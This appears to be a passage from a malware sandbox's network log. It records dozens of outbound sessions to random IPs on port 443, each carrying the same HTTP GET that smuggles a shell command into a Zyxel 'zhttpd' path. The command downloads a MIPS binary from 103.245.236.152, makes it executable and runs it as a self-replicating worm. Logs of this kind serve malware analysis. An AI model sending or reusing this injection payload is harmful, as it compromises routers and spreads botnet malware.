                                            Jan 14, 2024 15:50:46.572391987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6280192.168.2.2356408153.10.52.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572428942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6281192.168.2.2334542196.203.37.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572463036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6282192.168.2.235954844.123.38.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572513103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6283192.168.2.233869291.155.56.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572534084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6284192.168.2.2334112110.220.6.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572560072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6285192.168.2.2358906206.55.6.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572571039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6286192.168.2.235779259.148.193.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572602987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6287192.168.2.235061634.13.114.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572633028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6288192.168.2.236036235.126.56.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572654963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6289192.168.2.234635694.132.103.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572663069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6290192.168.2.233892214.135.233.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572660923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6291192.168.2.235205627.79.241.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572693110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6292192.168.2.2347736171.225.81.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572729111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6293192.168.2.234911620.128.42.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572776079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6294192.168.2.2342198100.46.195.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572812080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6295192.168.2.2344372196.251.139.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572858095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6296192.168.2.2350122122.225.244.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572866917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6297192.168.2.235409445.224.41.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572906971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6298192.168.2.2338310208.111.226.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572931051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6299192.168.2.233480668.22.161.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572961092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6300192.168.2.2357616217.154.247.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.572977066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6301192.168.2.233955452.226.64.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573008060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6302192.168.2.2336574195.250.11.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573040009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6303192.168.2.2334368193.199.228.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573041916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6304192.168.2.235899041.197.144.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573046923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6305192.168.2.235917686.22.117.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573087931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6306192.168.2.2336808141.157.234.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573087931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6307192.168.2.2334254148.1.7.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573144913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6308192.168.2.2347492104.107.8.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573164940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6309192.168.2.235900086.244.214.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573189020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6310192.168.2.235587423.97.105.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573227882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6311192.168.2.2348532120.135.135.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573249102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6312192.168.2.2343636187.128.156.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573287010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6313192.168.2.2341352125.61.101.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573319912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6314192.168.2.234144649.236.81.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573347092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6315192.168.2.2359672140.221.155.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573374987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6316192.168.2.235144053.173.216.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573402882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6317192.168.2.2359398134.238.184.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573438883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6318192.168.2.2346912213.188.35.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573482990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6319192.168.2.234161867.246.1.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573498964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6320192.168.2.233394661.65.250.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573527098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6321192.168.2.235476868.89.213.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573580027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6322192.168.2.235288419.73.136.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573612928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6323192.168.2.2348458188.76.46.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573627949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6324192.168.2.233907061.15.204.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573662996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6325192.168.2.23421862.2.47.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573713064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6326192.168.2.235505292.159.53.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573726892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6327192.168.2.235762878.72.113.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573756933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6328192.168.2.2342332115.45.252.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573805094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6329192.168.2.2335586209.67.112.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573817015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6330192.168.2.234388659.123.254.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573858976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6331192.168.2.2344554149.158.139.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573884010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6332192.168.2.2335872186.69.106.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573920965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6333192.168.2.2355054135.240.186.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573954105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6334192.168.2.2360380201.99.123.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.573993921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6335192.168.2.2335968159.84.214.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574014902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6336192.168.2.234057894.91.102.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574035883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6337192.168.2.2342164205.22.157.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574081898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6338192.168.2.2345754199.8.238.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574106932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6339192.168.2.235649638.198.93.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574148893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6340192.168.2.2355498103.82.145.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574173927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6341192.168.2.2351420194.57.125.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:46.574201107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6342192.168.2.234131441.112.87.84443
                                            TimestampBytes transferredDirectionData
